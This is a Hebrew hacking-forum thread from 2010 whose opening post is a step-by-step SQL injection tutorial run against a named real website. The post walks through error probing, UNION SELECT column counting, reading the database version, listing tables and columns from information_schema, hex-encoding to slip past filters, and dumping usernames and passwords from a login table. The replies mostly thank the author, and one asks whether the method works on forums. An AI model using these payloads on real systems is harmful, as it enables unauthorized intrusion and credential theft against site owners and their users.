קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [פרסום] מדריך SQLI+הדגמה על אתר!!
    על ידי roee147 בפורום האקינג ואבטחת מידע
    תגובות: 1
    הודעה אחרונה: 26-07-2010, 18:08
  2. [מוכר] מדריך לפריצת השידורים של אתר ה- NBA למי שמבין...
    על ידי nirm בפורום עשינו עסק - ארכיון
    תגובות: 0
    הודעה אחרונה: 09-11-2007, 22:12
  3. תגובות: 3
    הודעה אחרונה: 30-07-2007, 21:19
  4. תגובות: 5
    הודעה אחרונה: 21-07-2007, 13:48
  5. [מדריך]איך לכתוב כתובת אתר באינרטנט יותר מהר
    על ידי MAMZer בפורום ארכיון מדריכים
    תגובות: 2
    הודעה אחרונה: 20-07-2007, 13:18
+ תגובה לנושא
מציג תוצאות 1 עד 11 מתוך 11

מדריך SQLI+הדגמה על אתר!!

  1. #1
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל מדריך SQLI+הדגמה על אתר!!

    שלום פורום אטרף הכנתי לכם מדריך בנושא: sql injection.
    כמה דברים שניצטרך ליפני שנתחיל:
    1.אתר לנסות להזריק
    2.אתר אם דף פריץ
    עכשיו נוכל להמשיך במדריך.

    שלב א : גירסאת מסד נתונים

    אתר: http://www.evt-me.com דף פריץ: http://www.evt-me.com/newsDetail.php?id=-8
    כדי להתחיל ליפרוץ עלינו לדעת אים האתר פריץ, כאשר נוסיף גרש ' לאתר האתר ישתבש ויציג בפנינו שגיאה... דוגמא:
    http://www.evt-me.com/newsDetail.php?id=-8%27
    החזיר שגיאה? נוכל להמשיך.. נישתמש בפקודה union להוצאת/להכניס מידע למסד נתונים.
    דוגמא: כאשר נישתמש בunion נוכל להוציא/להכניס מידע כאשר נמשיך עד שיוצג בפנינו מיספר שבוא נזריק תשיאלתות שלנו..
    http://www.evt-me.com/newsDetail.php...ect+1,2,3,4,30
    לא הראה לנו מיספר?? נמשיך מי 4 עד שזה יראה לנו. דוגמא:
    http://www.evt-me.com/newsDetail.php...+1,2,3,4,5,6,7
    כאשר הגענו ל7, זה הציג בפנינו תפלט 2, זה אומר שבפלט 2 מי בין ה7 נזריק תשיאלתות שלנו!! עכשיו עלינו לדעת את גירסאת המסד... נכניס בפלט 2 את הפקודה שבודקת את הגירסא: version() דוגמא:
    http://www.evt-me.com/newsDetail.php...8%29,3,4,5,6,7
    גירסאת מסד:
    5.0.91-community

    שלב ב : מציאת טלבאות והוצעת עמודות!

    אחרי שגילינו את הגירסא זה אומר שנוכל להמשיך, בטח אתם שואלים למה היינו צריכים לדעת את הגירסא? אז... כאשר הגירסא היא 5+ אז יש תדטה בייס
    database: בכל דטה בייס יש טלבאות ובגריסא 5+ יש דטה בייס שקוראים לו, information_schema ושם נימצאות כל הטבלאות. כאשר אנחנו יודעים מה מסמן הגירסא נוכל להוציא טבלאות ותעמודות, נכניס בפלט 2 את הפלט הבא: group_concat(table_name) ובסוף(אחרי המיספר 7): from information_schema.tables דוגמא:
    http://www.evt-me.com/newsDetail.php..._schema.tables
    נמשיך בכך, שניבחר טבלה מעניינת במיקרה שלנו יש טבלה בשם: login, נציץ בעמודות שלה, נישתמש בפלט הבא: group_concat(column_name) ובסוף(אחרי המיספר 7) form information_schema.columns+where+table_name='login' דוגמא:
    http://www.evt-me.com/newsDetail.php...me=%27login%27
    יש אתרים שחוסמים 'table_name' אז מה עושים, למזלנו יש פיתרון צריך להפוך את המילה login ל hex יש אתר שמראה אותיות באנגלית וב hex:
    http://study.eitan.ac.il/sites/index...=7&page_id=159
    login=hex=6c6f67696e
    מוסיפים 0x זה צריך להיראות כך: 0x6c6f67696e אז נכניס בימקום 'admin'
    0x6c6f67696e דוגמא:
    http://www.evt-me.com/newsDetail.php...e=0x6c6f67696e
    זה הציג בפנינו תעמודות הבאות:
    id,pass,username,position,fullname
    עכשיו פשוט ניבדוק תעמודות username,pass

    שלב ג : שליפת שם מישתמש וסיסמה!

    לאחר שגילינו תעמדות נישלוף תנתונים שלהם, על ידי שיאלתה פשוטה. נכניס בפלט 2 את השיאלתה הבאה : concat(username,char(58),pass) ובסוף(אחרי המיספר 7) :
    from login דוגמא:
    http://www.evt-me.com/newsDetail.php?id=-8+union+select+1,2,concat(username,char(58),pass),4,5,6,7 from login
    מה שנישאר לעשות לימצוא פאנל היתחברות את זה תימצאו לבד..
    טוב זהו פה היסתיים המדריך שלנו, מקווה שלמדתם היום משהו!!
    קרדיט ל.. לי^^



    נערך לאחרונה על ידי roee147; 02-08-2010 בשעה 20:25.

  2. קישורים ממומנים

  3. #2
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    תגובות???

  4. #3

    ברירת מחדל

    תודה רבה


  5. #4
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Shinx צפיה בהודעה
    תודה רבה
    בבקשה אחי תמיד שמח לעזור..

  6. #5
    משתמש מתחיל
    שם פרטי
    ניצן
    תאריך הצטרפות
    07/2010
    הודעות
    82
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    תודה רועי

  7. #6

    ברירת מחדל

    מדריך טוב, עבודה טובה רועי
    נערך לאחרונה על ידי xyossizx; 26-07-2010 בשעה 05:28.
    אני טוען ששנינו אתאיסטים, אני רק מאמין באל אחד פחות ממך.
    כשתבין מדוע אתה מבטל את כל שאר האלים האפשרים, תבין מדוע אני מבטל את שלך.
    סטפן רוברטס


    And Man Created God In His Own Image



    Come Out

  8. #7
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי xyossizx צפיה בהודעה
    מדריך טוב, עבודה טובה רועי
    תודה אחי..

  9. #8
    מורחקים
    שם פרטי
    דני
    תאריך הצטרפות
    04/2010
    הודעות
    5,199
    לייקים
    23
    נקודות
    4,763
    מין: זכר

    ברירת מחדל

    תודה אחלה מדריך

  10. #9
    משתמש מתקדם
    שם פרטי
    שמעון
    תאריך הצטרפות
    06/2010
    גיל
    30
    הודעות
    613
    לייקים
    0
    נקודות
    1
    משפט מחץ
    משנה?
    מין: זכר

    ברירת מחדל

    כל הכבוד אחי ממש יפה!!
    תגיד זה עובד גם ל פורומים וכאלה?

  11. #10
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    תלוי בפורום..
    כל מי שרוצה עזרה קורסים בחינם הכל חינם לא כסף יכול לדבר איתי בסקייפ שלי:
    roeeko10 רק תבקשו עזרה!!
    נערך לאחרונה על ידי roee147; 26-07-2010 בשעה 23:40.

  12. #11
    משתמש כבוד האוואטר של theidan
    שם פרטי
    עידן
    תאריך הצטרפות
    08/2008
    הודעות
    7,540
    לייקים
    261
    נקודות
    10,001
    מין: זכר

    ברירת מחדל

    אחלה מדריך.
    כל הכבוד!
    היכולת לחוש כי מאחורי כל דבר שאפשר לחוות נמצא משהו שמוחנו אינו מסוגל לתפוס, משהו שיופיו ושגיבותו מגיעים אלינו רק בעקיפין ובהשתקפויות רפות, זוהי דתיות, במובן הזה אני דתי.

    אלברט איינשטיין

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 11:02.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,473,033 | הודעות: 8,173,620 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect